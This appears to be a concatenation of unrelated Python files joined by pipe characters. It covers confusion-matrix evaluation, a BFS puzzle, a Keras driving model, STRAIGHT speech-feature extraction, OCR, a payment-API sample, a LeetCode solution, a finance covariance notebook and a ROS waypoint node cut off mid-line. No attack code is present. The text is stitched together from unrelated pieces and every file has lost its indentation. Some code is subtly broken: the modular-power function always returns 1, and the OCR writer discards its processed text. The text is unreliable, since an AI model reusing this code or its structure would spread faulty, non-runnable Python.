# pact=e.P.Activity if not(e.P is None) else 0
# ract=e.R.Activity if not(e.R is None) else 0
# cm[pact][ract]+=max((eobj.end-eobj.begin)/pd.to_timedelta('60s').value,0.01);
# #for p in predicted:
# # for q in realtree[p['StartTime'].value:p['EndTime'].value]:
# # timeconfusion_matrix[p['Activity']][q.data['Activity']]+=findOverlap(p,q.data);
# return cm
# #test_a_events_arr=[x for i,x in test_a_events.iterrows() ]
# #matrix=myaccuracy(test_a_events_arr,testactp)
# #pd.DataFrame(matrix)
# #plot_confusion_matrix(matrix,activities)
# #ev=prepareEval(runs)
# # print(ev[0]['cm'])
# # np.set_printoptions(precision=0)
# # np.set_printoptions(suppress=True)
# # print(np.array(ev[0]['mycm']))
# def myaccuracy2(predicted0,real0):
# predicted=[p for i,p in predicted0.iterrows()]
# real=[p for i,p in real0.iterrows()]
# realtree=makeIntervalTree(real)
# #predictedtree=makeIntervalTree(predicted)
# predictedtree=makeNonOverlapIntervalTree(predicted)
# #predictedtree=makeIntervalTree(labels)
# timeconfusion_matrix=np.zeros((len(activities),len(activities)))
# for p in real:
# for q in predictedtree[p['StartTime'].value:p['EndTime'].value]:
# timeconfusion_matrix[p['Activity']][q.data['Activity']]+=findOverlap(p,q.data);
# #for p in predicted:
# # for q in realtree[p['StartTime'].value:p['EndTime'].value]:
# # timeconfusion_matrix[p['Activity']][q.data['Activity']]+=findOverlap(p,q.data);
# return timeconfusion_matrix
# #test_a_events_arr=[x for i,x in test_a_events.iterrows() ]
# #matrix=myaccuracy(test_a_events_arr,testactp)
# #pd.DataFrame(matrix)
# #plot_confusion_matrix(matrix,activities)
# def event_confusion_matrix(r_activities,p_activities,labels):
# cm=np.zeros((len(labels),len(labels)))
# # begin=real0.StartTime.min()
# # end=real0.EndTime.max()
# predicted=[p for i,p in p_activities.iterrows()]
# real=[p for i,p in r_activities.iterrows()]
# # predicted.append({'StartTime':begin,'EndTime':end,'Activity':0})
# # real.append({'StartTime':begin,'EndTime':end,'Activity':0})
# events=merge_split_overlap_IntervalTree(real,predicted)
# #predictedtree=makeIntervalTree(labels)
# cm=np.zeros((len(activities),len(activities)))
# for eobj in events:
# e=eobj.data
# pact=e.P.Activity if not(e.P is None) else 0
# ract=e.R.Activity if not(e.R is None) else 0
# cm[ract][pact]+=max((eobj.end-eobj.begin)/pd.to_timedelta('60s').value,0.01);
# #for p in predicted:
# # for q in realtree[p['StartTime'].value:p['EndTime'].value]:
# # timeconfusion_matrix[p['Activity']][q.data['Activity']]+=findOverlap(p,q.data);
# return cm
# def merge_split_overlap_IntervalTree(r_acts,p_acts):
# tree=IntervalTree()
# for act in p_acts:
# start=act['StartTime'].value;
# end=act['EndTime'].value;
# if(start==end):
# start=start-1
# #tree[start:end]={'P':{'Activitiy':act.Activity,'Type':'P','Data':act}]
# d=Data('P-act')
# d.P=act
# d.R=None
# tree[start:end]=d #{'P':act,'PActivitiy':act.Activity}
# for act in r_acts:
# start=act['StartTime'].value;
# end=act['EndTime'].value;
# if(start==end):
# start=start-1
# #tree[start:end]=[{'Activitiy':act.Activity,'Type':'R','Data':act}]
# d=Data('P-act')
# d.P=None
# d.R=act
# tree[start:end]=d #{'R':act,'RActivitiy':act.Activity}
# tree.split_overlaps()
# def data_reducer(x,y):
# res=x
# if not(y.P is None):
# if (res.P is None) or y.P['EndTime']<res.P['EndTime']:
# res.P=y.P
# if not(y.R is None):
# if (res.R is None) or y.R['EndTime']<res.R['EndTime']:
# res.R=y.R
# return res
# tree.merge_equals(data_reducer=data_reducer)
# return tree
|
import collections
import sys
sys.setrecursionlimit(100000)
N, M, H = map(int, sys.stdin.readline().split())
queue = collections.deque([])
box = [[]for i in range(H)]
check_num = 2
swap = 0
result_day = 0
ss = 0
for j in range(H):
for i in range(M):
box[j].append(list(map(int, sys.stdin.readline().split())))
for z in range(H):
for i in range(M):
for j in range(N):
if box[z][i][j] == 1:
queue.append((z, i, j))
while queue:
S = len(queue)
while S:
z, x, y = queue.popleft()
if not (x-1) < 0:
if (box[z][x-1][y] == 0):
queue.append((z, x-1, y))
box[z][x-1][y] = 1
if not (x+1) >= M:
if box[z][x+1][y] == 0:
queue.append((z, x+1, y))
box[z][x+1][y] = 1
if not (y-1) < 0:
if box[z][x][y-1] == 0:
queue.append((z, x, y-1))
box[z][x][y-1] = 1
if not (y+1) >= N:
if box[z][x][y+1] == 0:
queue.append((z, x, y+1))
box[z][x][y+1] = 1
if not (z-1) < 0:
if box[z-1][x][y] == 0:
queue.append((z-1, x, y))
box[z-1][x][y] = 1
if not (z+1) >= H:
if box[z+1][x][y] == 0:
queue.append((z+1, x, y))
box[z+1][x][y] = 1
S -= 1
result_day += 1
for z in range(H):
for i in range(M):
for j in range(N):
if box[z][i][j] == 0:
result_day = -1
break
if result_day == -1:
break
if result_day == -1:
print(result_day)
else:
print(result_day-1)
|
import os
import cv2
import csv
import numpy as np
from sklearn.utils import shuffle
from sklearn.model_selection import train_test_split
from keras.models import Sequential, Model
from keras.layers import Lambda, Cropping2D, BatchNormalization, ELU
from keras.layers.core import Dense, Dropout, Activation, Flatten, Reshape
from keras.layers.convolutional import Convolution2D
from keras.regularizers import l2
from functions import uniform_data, gen
# Parse CSV
samples = []
with open('./driving_log.csv') as csvfile:
reader = csv.reader(csvfile)
for line in reader:
samples.append(line)
# Split samples into training/test set
train_samples, valid_samples = train_test_split(samples, test_size=0.1)
# Make data more uniform(bins data and cuts all bins to average bin length)
# Dont use anymore. Data is made uniform in generator
'''
print("Length before uniform:" + str(len(train_samples)))
train_samples = uniform_data(train_samples,bin_num=15)
print("Length after uniform:" + str(len(train_samples)))
'''
##### MODEL ####
model = Sequential()
# Preprocess incoming data, centered around zero with small standard deviation and crop
model.add(Lambda(lambda x: x/127.5 - 1., input_shape=(90,320,3)))
# Convolution layers with ELU activation and batch normalization
model.add(Convolution2D(24, 5,5, activation='elu', subsample=(2, 2), border_mode='valid'))
model.add(BatchNormalization())
model.add(Convolution2D(36, 5,5, activation='elu', subsample=(2, 2), border_mode='valid'))
model.add(BatchNormalization())
model.add(Convolution2D(48, 5,5, activation='elu', subsample=(2, 2), border_mode='valid'))
model.add(BatchNormalization())
model.add(Convolution2D(64, 3,3, activation='elu', border_mode='valid'))
model.add(BatchNormalization())
# Fully Connected layers with ELU activation and dropout layers
model.add(Flatten())
model.add(Dropout(0.50))
model.add(Dense(100, activation='elu'))
model.add(Dropout(0.50))
model.add(Dense(50, activation='elu'))
model.add(Dropout(0.50))
model.add(Dense(10, activation='elu'))
model.add(Dropout(0.50))
model.add(Dense(1))
model.compile(loss='mse', optimizer='adam')
#### TRAIN ####
# Training parameters
batch_size = 128
augmentation_factor = 4 #cameras(3) * flip(2) * 70% drop rate
epochs = 5
# Create generators
train_generator = gen(train_samples, batch_size=batch_size)
validation_generator = gen(valid_samples, batch_size=batch_size)
# fit model
training_size = len(train_samples) * augmentation_factor
valid_size = len(valid_samples) * augmentation_factor
model.fit_generator(train_generator, samples_per_epoch= training_size,\
validation_data=validation_generator, \
nb_val_samples=valid_size, nb_epoch=epochs)
model.save('model.h5')
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
SYNOPSIS
extract_straight [-h,--help] [-v,--verbose] [--version]
DESCRIPTION
TODO This describes how to use this script. This docstring
will be printed by the script if there is an error or
if the user requests help (-h or --help).
EXAMPLES
TODO: Show some examples of how to use this script.
EXIT STATUS
TODO: List exit codes
AUTHOR
Sébastien Le Maguer <Sebastien.Le_maguer@irisa.fr>
LICENSE
This script is in the public domain, free from copyrights or restrictions.
VERSION
$Id$
"""
import glob # For listing all *.XXX files
import ConfigParser # For configuration file management
import bitstring
from bitstring import ConstBitStream
import numpy
import subprocess
from subprocess import call, Popen # For running external commands
import math
import string
import sys, os, traceback, optparse
import time
import re
import logging
#from pexpect import run, spawn
FNULL = open(os.devnull, 'w') # dev/null handler constant
################################################################################
### Extraction functions
################################################################################
def extractStraight(wav_dir, sp_dir, f0_dir, ap_dir):
"""
Extract STRAIGHT coefficients to their respective directories
"""
global configuration, logger
logger.info("START STRAIGHT EXTRACTION")
frameshift_ms = float(configuration.get("extract", "frameshift")) / float(configuration.get("extract", "sampfreq")) * 1000
# Generate script header
script_content = """
addpath('%s');
prm.F0frameUpdateInterval = %f;
prm.F0searchUpperBound = %s;
prm.F0searchLowerBound = %s;
prm.spectralUpdateInterval = %f;
""" % (configuration.get("tools", "straight"),
frameshift_ms,
configuration.get("f0", "upperf0"),
configuration.get("f0", "lowerf0"),
frameshift_ms)
# Generate script content
for wav_fn in glob.iglob(wav_dir + "/*.wav"):
base = os.path.basename(wav_fn)[:-4]
sp_fn = sp_dir + "/" + base + ".sp"
ap_fn = ap_dir + "/" + base + ".ap"
f0_fn = f0_dir + "/" + base + ".f0"
script_content += """
fprintf(1,'Processing %s\\n');
[x, fs] = wavread('%s');
[f0, ap] = exstraightsource(x, fs, prm);
[sp] = exstraightspec(x, f0, fs, prm);
ap = ap';
sp = sp';
f = fopen('%s', 'wb'); fwrite(f, sp, 'float'); fclose(f);
f = fopen('%s', 'wb'); fwrite(f, f0, 'float'); fclose(f);
f = fopen('%s', 'wb'); fwrite(f, ap, 'float'); fclose(f);
""" % (wav_fn, wav_fn, sp_fn, f0_fn, ap_fn);
# Save script
if not os.path.isdir(configuration.get("directories", "script_dir")):
os.mkdir(configuration.get("directories", "script_dir"))
f_script = open(configuration.get("directories", "script_dir") + "/extract_straight.m", "w")
f_script.write(script_content)
f_script.close()
# Execute matlab
if not os.path.isdir(sp_dir):
os.mkdir(sp_dir)
os.mkdir(f0_dir)
os.mkdir(ap_dir)
f_script = open(configuration.get("directories", "script_dir") + "/extract_straight.m")
try:
call(["matlab", "-nodisplay", "-nosplash", "-nojvm"], stdin=f_script, stdout=FNULL)
finally:
f_script.close()
logger.info("END STRAIGHT EXTRACTION")
def sp2mgc(sp_dir, mgc_dir):
"""
Generate MGC coefficients from the spectrum extracted by STRAIGHT
"""
global configuration, logger
logger.info("START SP2MGC CONVERSION")
# Create directory
if not os.path.isdir(mgc_dir):
os.mkdir(mgc_dir)
sampfreq_khz = int(configuration.get("extract", "sampfreq")) * 0.001
for sp_fn in glob.iglob(sp_dir + "/*.sp"):
base = os.path.basename(sp_fn)[:-4]
mgc_fn = mgc_dir + "/" + base + ".mgc"
logger.debug("convert %s ...." % sp_fn)
cmd_mgcep = ["mgcep",
"-a " + configuration.get("mgc", "freqwarp"),
"-m " + configuration.get("mgc", "order"),
"-l 2048 -e 1.0E-08 -j 0 -f 0.0 -q 3" # FIXME: constants
]
if int(configuration.get("mgc", "gamma")) != 0:
cmd_mgcep += ["-o 4 "] # FIXME: constants
cmd_lpc2lsp = ["lpc2lsp",
"-n 2048 -p 8 -d 1.0E-08", # FIXME: constants
"-m " + configuration.get("mgc", "order"),
"-s " + str(sampfreq_khz)
]
if int(configuration.get("mgc", "lngain")) == 1:
cmd_lpc2lsp += ["-l"]
#cmd += ["> " + mgc_fn]
f_sp = open(sp_fn)
f_mgc = open(mgc_fn, "w")
try:
call(string.join(cmd_mgcep), shell=True, stdin=f_sp, stdout=f_mgc)
except Exception:
logger.error(traceback.format_exc())
finally:
f_sp.close()
f_mgc.close()
logger.info("END SP2MGC CONVERSION")
def f02lf0(f0_dir, lf0_dir):
"""
Convert F0 to the log scale
"""
global configuration, logger
logger.info("START F02LF0 CONVERSION")
# Create directory
if not os.path.isdir(lf0_dir):
os.mkdir(lf0_dir)
for f0_fn in glob.iglob(f0_dir + "/*.f0"):
base = os.path.basename(f0_fn)[:-4]
logger.debug("convert %s ...." % f0_fn)
lf0_fn = lf0_dir + "/" + base + ".lf0"
f_in = open(f0_fn, "rb")
raw_data = ConstBitStream(f_in)
f_in.close()
float_num = raw_data.readlist('floatle:32')
f_out = open(lf0_fn, "wb")
try:
while True:
if float_num[0] == 0:
float_num = numpy.float32(-1e+10)
else:
float_num = numpy.float32(math.log(float_num[0]))
f_out.write(float_num)
float_num = raw_data.readlist('floatle:32')
except bitstring.ReadError:
pass
finally:
f_out.close()
logger.info("END F02LF0 CONVERSION")
def ap2bap(ap_dir, bap_dir):
"""
Generate band values from the aperiodicity extracted by STRAIGHT
"""
global configuration, logger
logger.info("START AP2BAP CONVERSION")
# Create directory
if not os.path.isdir(bap_dir):
os.mkdir(bap_dir)
for ap_fn in glob.iglob(ap_dir + "/*.ap"):
base = os.path.basename(ap_fn)[:-4]
bap_fn = bap_dir + "/" + base + ".bap"
logger.debug("convert %s ...." % bap_fn)
f_ap = open(ap_fn)
f_bap = open(bap_fn, "w")
try:
cmd = ["mgcep",
"-a", configuration.get("mgc", "freqwarp"),
"-m", configuration.get("bap", "order"),
# FIXME: constants
"-l", "2048", "-e", "1.0E-08", "-j", "0", "-f", "0.0", "-q", "1"]
call(cmd, shell=True, stdout=f_bap, stdin=f_ap)
except Exception:
# FIXME: message
logger.error(traceback.format_exc())
finally:
f_ap.close()
f_bap.close()
logger.info("END AP2BAP CONVERSION")
################################################################################
### Configuration loading and logging setup functions
################################################################################
def loadConfiguration(conf_file):
"""
Loading the configuration file conf_file
"""
global configuration
configuration = ConfigParser.SafeConfigParser()
configuration.read(conf_file)
def setupLogging(is_verbose):
"""
Setup logging according to the verbose mode
"""
logging.basicConfig(format='[%(asctime)s] %(levelname)s : %(message)s')
if not is_verbose:
level = logging.INFO
else:
level = logging.DEBUG
# handler = ColorizingStreamHandler(sys.stderr)
# root.setLevel(logging.DEBUG)
# if root.handlers:
# for handler in root.handlers:
# root.removeHandler(handler)
# formatter = logging.Formatter(datefmt='%Y/%m/%d %H:%M',
# fmt='[%(asctime)s %(name)s %(levelname)s] %(message)s')
# handler.setFormatter(formatter)
# logging.getLogger().addHandler(handler)
logger = logging.getLogger("EXTRACT_STRAIGHT")
logger.setLevel(level)
return logger
################################################################################
### Main function
################################################################################
def main():
"""Main entry function
"""
global options, args
# Init
loadConfiguration(args[0])
data_dir = configuration.get("directories", "root") + "/" + configuration.get("directories", "data_dir")
# STRAIGHT coefficient extraction
extractStraight(data_dir + "/" + configuration.get("directories", "wav_dir"),
data_dir + "/" + configuration.get("directories", "sp_dir"),
data_dir + "/" + configuration.get("directories", "f0_dir"),
data_dir + "/" + configuration.get("directories", "ap_dir"))
# STRAIGHT coefficient conversion
sp2mgc(data_dir + "/" + configuration.get("directories", "sp_dir"),
data_dir + "/" + configuration.get("directories", "mgc_dir"))
f02lf0(data_dir + "/" + configuration.get("directories", "f0_dir"),
data_dir + "/" + configuration.get("directories", "lf0_dir"))
ap2bap(data_dir + "/" + configuration.get("directories", "ap_dir"),
data_dir + "/" + configuration.get("directories", "bap_dir"))
################################################################################
### Main part encapsulation
################################################################################
if __name__ == '__main__':
try:
parser = optparse.OptionParser(formatter=optparse.TitledHelpFormatter(),
usage=globals()['__doc__'],
version='$Id$')
parser.add_option('-v', '--verbose', action='store_true',
default=False, help='verbose output')
(options, args) = parser.parse_args()
logger = setupLogging(options.verbose)
# Debug time
start_time = time.time()
if options.verbose: logger.debug(time.asctime())
# Running main function <=> run application
main()
# Debug time
if options.verbose: logger.debug(time.asctime())
if options.verbose: logger.debug('TOTAL TIME IN MINUTES: %f' % ((time.time() - start_time) / 60.0))
# Exit program
sys.exit(0)
except KeyboardInterrupt, e: # Ctrl-C
raise e
except SystemExit, e: # sys.exit()
pass
except Exception, e:
print 'ERROR, UNEXPECTED EXCEPTION'
print str(e)
traceback.print_exc()
os._exit(1)
|
classmates = ['Michael', 'Bob', 'Tracy']
classmates.insert(1,'Jack')
print classmates
classmates = ('Michael', 'Bob', 'Tracy')
classmates = ('Jack',)
print type(classmates)
print classmates
s = set([1, 2, 3])
s.add(4)
print s
s.remove(2)
print s
l = range(100)
print l
print l[1:10]
print l[:10]
print l[3:]
print l[-10:]
print l[:20:2]
print 'comprehasion:\n'
a = [x*2 for x in l]
print a
|
# Chapter 02 - Unit 11 - health
"""
Example:
Input:
5
16 17 15 16 17
180 175 172 170 165
67 72 59 62 55
5
15 17 16 15 16
166 156 168 170 162
45 52 56 58 47
Output:
16.2
172.4
63.0
15.8
164.4
51.6
A
"""
class Student:
def __init__(self, age, height, weight):
self.age = age
self.height = height
self.weight = weight
class Class:
def __init__(self, name):
self.name = name
self.students = list()
def age_average(self):
s = 0
for i in self.students:
s += i.age
return float(s / len(self.students))
def height_average(self):
s = 0
for i in self.students:
s += i.height
return float(s / len(self.students))
def weight_average(self):
s = 0
for i in self.students:
s += i.weight
return float(s / len(self.students))
def info(self):
print(self.age_average())
print(self.height_average())
print(self.weight_average())
def set_class(n, c):
ages = input()
heights = input()
weights = input()
ages = ages.split()
heights = heights.split()
weights = weights.split()
for i in range(n):
a = int(ages[i])
h = int(heights[i])
w = int(weights[i])
std = Student(a, h, w)
c.students.append(std)
n = int(input())
A = Class('A')
set_class(n, A)
n = int(input())
B = Class('B')
set_class(n, B)
A.info()
B.info()
ah = A.height_average()
aw = A.weight_average()
bh = B.height_average()
bw = B.weight_average()
if ah > bh:
print(A.name)
elif ah == bh:
if aw < bw:
print(A.name)
elif aw == bw:
print('Same')
else:
print(B.name)
else:
print(B.name)
|
import click
import cv2
import pdf2image
import pytesseract as pt
import logging
from data_utils import *
logger = logging.getLogger("test.py")
logger.setLevel(logging.DEBUG)
class ocr_reader:
def __init__(self, input_file, output_file, text=""):
self.input_file = input_file
self.output_file = output_file
self.text = text
def ocr_utils(self):
image = cv2.imread(self.input_file)
image = preprocess(image, self.input_file)
text = pt.image_to_string(image)
return text
def pdf_to_img(self):
return pdf2image.convert_from_path(self.input_file)
def pdf_pages(self):
images = self.pdf_to_img()
for pg, img in enumerate(images):
img = preprocess(np.array(img), self.input_file)
return pt.image_to_string(img)
def write_file(self, text):
text = postprocess(text)
with open(self.output_file, 'a') as out:
out.write(self.text)
@click.command()
@click.option('--input', type=str)
@click.option('--output', type=str)
@click.option('--verbose', '--verbose', count=True)
def main(input, output, verbose):
#click.echo(input)
if input.endswith("png") or input.endswith("jpeg") or input.endswith("jpg"):
text = ocr_reader(input,output).ocr_utils()
ocr_reader(input,output,text).write_file(text)
elif input.endswith("pdf"):
#images = ocr_reader(input,output).pdf_to_img()
text = ocr_reader(input,output).pdf_pages()
ocr_reader(input,output,text).write_file(text)
else:
logger.error("File type not supported!")
click.echo('Ocr reading finished! output is saved in specified filename')
if __name__ == '__main__':
logger.info("Ocr reading started !")
main()
##logger.info("Ocr reading finished! output is saved in specified filename.")
|
from CyberSource import *
import os
from importlib.machinery import SourceFileLoader
config_file = os.path.join(os.getcwd(), "data", "Configuration.py")
configuration = SourceFileLoader("module.name", config_file).load_module()
def available_reports():
try:
start_time = "2018-10-01T00:00:00.0Z"
end_time = "2018-10-30T23:59:59.0Z"
time_query_type = "executedTime"
# Reading Merchant details from Configuration file
config_obj = configuration.Configuration()
details_dict1 = config_obj.get_configuration()
report_obj = ReportsApi(details_dict1)
return_data, status, body = report_obj.search_reports(start_time, end_time, time_query_type)
print("API RESPONSE CODE : ", status)
print("API RESPONSE BODY : ", body)
except Exception as e:
print("Exception when calling ReportsApi->search_reports: %s\n" % e)
if __name__ == "__main__":
available_reports()
|
#
# @lc app=leetcode id=79 lang=python3
#
# [79] Word Search
#
# https://leetcode.com/problems/word-search/description/
#
# algorithms
# Medium (32.07%)
# Total Accepted: 314K
# Total Submissions: 978.9K
# Testcase Example: '[["A","B","C","E"],["S","F","C","S"],["A","D","E","E"]]\n"ABCCED"'
#
# Given a 2D board and a word, find if the word exists in the grid.
#
# The word can be constructed from letters of sequentially adjacent cell, where
# "adjacent" cells are those horizontally or vertically neighboring. The same
# letter cell may not be used more than once.
#
# Example:
#
#
# board =
# [
# ['A','B','C','E'],
# ['S','F','C','S'],
# ['A','D','E','E']
# ]
#
# Given word = "ABCCED", return true.
# Given word = "SEE", return true.
# Given word = "ABCB", return false.
#
#
#
class Solution:
def exist(self, board: List[List[str]], word: str) -> bool:
visited = [[0]*len(board[0]) for i in range(len(board))]
for i in range(len(board)):
for j in range(len(board[i])):
if board[i][j] == word[0]:
visited = [[0]*len(board[0]) for i in range(len(board))]
if self.find(visited, board, word, 0, i, j):
return True
return False
def find(self, visited, board, word, index, row, col):
if index >= len(word) or board[row][col] != word[index] or visited[row][col]:
return False
if index == len(word) - 1:
return True
visited[row][col] = 1
if row-1 >= 0 and visited[row-1][col] == 0:
if self.find(visited, board, word, index+1, row-1, col):
return True
visited[row-1][col] = 0
if row+1 < len(board) and visited[row+1][col] == 0:
if self.find(visited, board, word, index+1, row+1, col):
return True
visited[row+1][col] = 0
if col-1 >= 0 and visited[row][col-1] == 0:
if self.find(visited, board, word, index+1, row, col-1):
return True
visited[row][col-1] = 0
if col+1 < len(board[0]) and visited[row][col+1] == 0:
if self.find(visited, board, word, index+1, row, col+1):
return True
visited[row][col+1] = 0
return False
|
# -*- coding: utf-8 -*-
# @Time : 2019-10-20 19:29
# @Author : icarusyu
# @FileName: 2.py
# @Software: PyCharm
# def f():
# n = int(input())
# zheng = 1
# ni = 0
# while n>0:
# zheng, ni = 3*zheng + ni, zheng + 3*ni
# # print(zheng,ni)
# n-=1
# return zheng % (10**9+7)
# def f():
# n = int(input())
# # if n==1:return 3
# i = n+1
# j = 2
# res = 1
# while i >1:
# # print('last',res)
# res = 4*res - 2**(j-2)
# j+=1
# # print('tt',2**(i-2))
# # print('res',res)
# i-=1
# return res %(10**9+7)
# def mi(n):
# # 快速幂求x ^ y
# n2 = n * 2 - 1
# n1 = n - 1
# base = 2
# a = 1
# mod = 1e9+7
# res = 0
# while n1 > 0:
# cur = n1 % 2
# if cur == 1:
# a *= base
# a = int(a % mod)
# if n1 > 0:
# base = base * base
# base = int(base % mod)
# n1 = n1 >> 1
# return n1
def mi(base,n):
mod = 1e9+7
res = 1
a = 1
while n>0:
cur = n%2
if cur==1:
a = int((a*base) % mod)
base = int((base * base)%mod)
n= n>>1
return res
def f():
n = int(input())
a = mi(2,n)
print(a)
res = (a + a*a)//2 % (1e9+7)
return res
print(f()) |
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:light
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.4'
# jupytext_version: 1.2.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import cma_gui as cma
import numpy as np
import pandas as pd
from statsmodels.stats.weightstats import DescrStatsW
# +
# Exponential weight
count = [x for x in range(240)]
count.reverse()
percent = [(1-cma.val_dict['lambda_val'])*(cma.val_dict['lambda_val']**x) for x in count]
sum_val = sum(percent)
exponential_weight = pd.Series([x / sum_val for x in percent])
# -
# # Define functions
# ## Standard deviation functions
# +
def monthly_standard_dev(dataframe_returns, exponential_weight):
# Monthly variance
df_variance = (dataframe_returns - dataframe_returns.mean())**2
func = lambda x: np.asarray(x) * np.asarray(exponential_weight)
df_variance = df_variance.apply(func)
monthly_variance = df_variance.sum()
# Monthly standard deviation
monthly_std_dev = np.sqrt(monthly_variance)
return monthly_std_dev
def exponential_std_dev(monthly_std_dev, exponential_weight, dataframe_returns):
# Annual adjusted standard deviation
monthly_std_dev_list = monthly_std_dev.tolist()
adj_sd_list2 = [x**2 for x in monthly_std_dev_list]
sum_prod = (1 + pd.Series([dataframe_returns.iloc[:,x].values.dot(exponential_weight.values)
for x in range(len(dataframe_returns.columns))]))**2
base = [sum(x) for x in zip(sum_prod, adj_sd_list2)]
equation_p1 = [x**12 for x in base]
sum_prod2 = (1 + pd.Series([dataframe_returns.iloc[:,x].values.dot(exponential_weight.values)
for x in range(len(dataframe_returns.columns))]))
base_2 = sum_prod2.tolist()
equation_p2 = [x ** (2*12) for x in base_2]
pre_final = [x-y for x,y in zip(equation_p1, equation_p2)]
annual_adj_std_dev = pd.DataFrame(np.sqrt(pre_final))
annual_adj_std_dev.index = dataframe_returns.columns
return annual_adj_std_dev
# -
# ## Covariance and Correlation Matrices Functions
# +
def value_minus_mean(dataframe_returns, monthly_std_dev, exponential_weight):
# Value Minus Mean / Standard Deviation
average = dataframe_returns.mean()
value_minus_mean_div_sd = (dataframe_returns.sub(average)).div(monthly_std_dev)
value_minus_mean_div_sd.index = exponential_weight.index
return value_minus_mean_div_sd
def exponential_correlation(value_minus_mean, exponential_weight):
exp_corr_raw = []
for x in range(len(value_minus_mean.columns)):
col = [(value_minus_mean.iloc[:,x]*value_minus_mean.iloc[:,i]*exponential_weight).sum() for i in range(len(value_minus_mean.columns))]
exp_corr_raw.append(col)
exp_corr = pd.DataFrame(exp_corr_raw)
exp_corr.index = value_minus_mean.columns
exp_corr.columns = value_minus_mean.columns
return exp_corr
def stand_dev_matrix(annual_adj_std_dev):
df_annual_adj_std_dev = pd.DataFrame(annual_adj_std_dev)
matrix_sd = df_annual_adj_std_dev.dot(df_annual_adj_std_dev.T)
return matrix_sd
# -
# # USD
# ## Import Data
# +
# Extract Indices
equity_us_code = list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'equity_us_code' in k}.values())))
fixed_us_code = list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'fixed_us_code' in k}.values())))
alts_us_code = list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'alts_us_code' in k}.values())))
# Import returns
df_returns_us = pd.read_csv('P:\\Advisory\\Research\\Automation\\CMAs\\Data\\combined_returns_us.csv', index_col=0)/100
# -
# ## Standard Deviations
# +
# Monthly standard deviation
monthly_std_dev_us = monthly_standard_dev(df_returns_us, exponential_weight)
# Annual adjusted standard deviation
annual_adj_std_dev_us = exponential_std_dev(monthly_std_dev_us, exponential_weight, df_returns_us)
# -
# ## Covariance and Correlation Matrices
# +
value_minus_mean_div_sd_us = value_minus_mean(df_returns_us, monthly_std_dev_us, exponential_weight)
# Exponential correlation
exp_corr_us = exponential_correlation(value_minus_mean_div_sd_us, exponential_weight)
# Exponential covariance
matrix_sd_us = stand_dev_matrix(annual_adj_std_dev_us)
exp_cov_us = exp_corr_us.mul(matrix_sd_us, axis=0)
# Final correlation matrix
corr_matrix_final_us = (exp_cov_us.div(matrix_sd_us))
# -
# # Non-USD
# ## Import Data
# +
# Extract Indices
equity_nonus_code = list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'equity_nonus_code' in k}.values())))
fixed_nonus_code = list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'fixed_nonus_code' in k}.values())))
alts_nonus_code = list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'alts_nonus_code' in k}.values())))
# Import returns
df_returns_nonus = pd.read_csv('P:\\Advisory\\Research\\Automation\\CMAs\\Data\\combined_returns_nonus.csv', index_col=0)
# -
# ## Standard Deviations
# +
# Monthly standard deviation
monthly_std_dev_nonus = monthly_standard_dev(df_returns_nonus, exponential_weight)
# Annual adjusted standard deviation
annual_adj_std_dev_nonus = exponential_std_dev(monthly_std_dev_nonus, exponential_weight, df_returns_nonus)
annual_adj_std_dev_nonus
# -
# ## Covariance and Correlation Matrices
# +
value_minus_mean_div_sd_nonus = value_minus_mean(df_returns_nonus, monthly_std_dev_nonus, exponential_weight)
# Exponential correlation
exp_corr_nonus = exponential_correlation(value_minus_mean_div_sd_nonus, exponential_weight)
# Exponential covariance
matrix_sd_nonus = stand_dev_matrix(annual_adj_std_dev_nonus)
exp_cov_nonus = exp_corr_nonus.mul(matrix_sd_nonus, axis=0)
# Final correlation matrix
corr_matrix_final_nonus = (exp_cov_nonus.div(matrix_sd_nonus))
corr_matrix_final_nonus
# -
|
#!/usr/bin/env python
import rospy
from geometry_msgs.msg import PoseStamped
from styx_msgs.msg import Lane, Waypoint, TrafficLightArray, Intersection
from geometry_msgs.msg import TwistStamped
import math
import tf
import numpy as np
'''
This node will publish waypoints from the car's current position to some `x` distance ahead.
As mentioned in the doc, you should ideally first implement a version which does not care
about traffic lights or obstacles.
Once you have created dbw_node, you will update this node to use the status of traffic lights too.
Please note that our simulator also provides the exact location of traffic lights and their
current status in `/vehicle/traffic_lights` message. You can use this message to build this node
as well as to verify your TL classifier.
TODO (for Yousuf and Aaron): Stopline location for each traffic light.
'''
LOOKAHEAD_WPS = 200 # Number of waypoints we will publish. You can change this number
TARGET_SPEED = 5.0
SAMPLE_RATE = 100
ENABLE_TL = 1
MAX_DECEL = 1
STOPPING_DISTANCE = 5
class WaypointUpdater(object):
def __init__(self):
rospy.init_node('waypoint_updater')
#rospy.Subscriber('/vehicle/traffic_lights', TrafficLightArray, self.traffic_cb, queue_size=1)
rospy.Subscriber('/current_pose', PoseStamped, self.pose_cb, queue_size=1)
self.base_wp_sub = rospy.Subscriber('/base_waypoints', Lane, self.waypoints_cb)
rospy.Subscriber('/current_velocity', TwistStamped, self.current_velocity_cb)
rospy.Subscriber('/traffic_waypoint', Intersection, self.traffic_waypoint_cb)
# TODO: Add a subscriber for /traffic_waypoint and /obstacle_waypoint below
self.final_waypoints_pub = rospy.Publisher('final_waypoints', Lane, queue_size=1)
# Subscribe to ground truth traffic light array for development
# TODO: Add other member variables you need below
self.car_x = None
self.car_y = None
self.car_yaw = None
self.car_pose = None
self.car_velo = 0.0
self.car_closest_wp = None
self.first_waypoint = 0
self.base_waypoints = None
self.tl_list = None # list of all traffic lights
self.tl_X = None # closest traffic light X
self.tl_Y = None # closest traffic light Y
self.tl_S = None # closest traffic light state
self.tl_wp = None # nearest Waypoint to the next light
self.tl_stop_wp = None
self.tl_list = []
self.braking = 0
self.stop_at_wp = None
self.target_velo = TARGET_SPEED
rospy.spin()
def pose_cb(self, msg):
self.car_x = msg.pose.position.x
self.car_y = msg.pose.position.y
self.car_pose = msg.pose
if self.base_waypoints is None:
return
#need to know euler yaw angle for car orientation relative to waypoints
#for quaternion transformation using https://answers.ros.org/question/69754/quaternion-transformations-in-python/
quaternion = [msg.pose.orientation.x,
msg.pose.orientation.y,
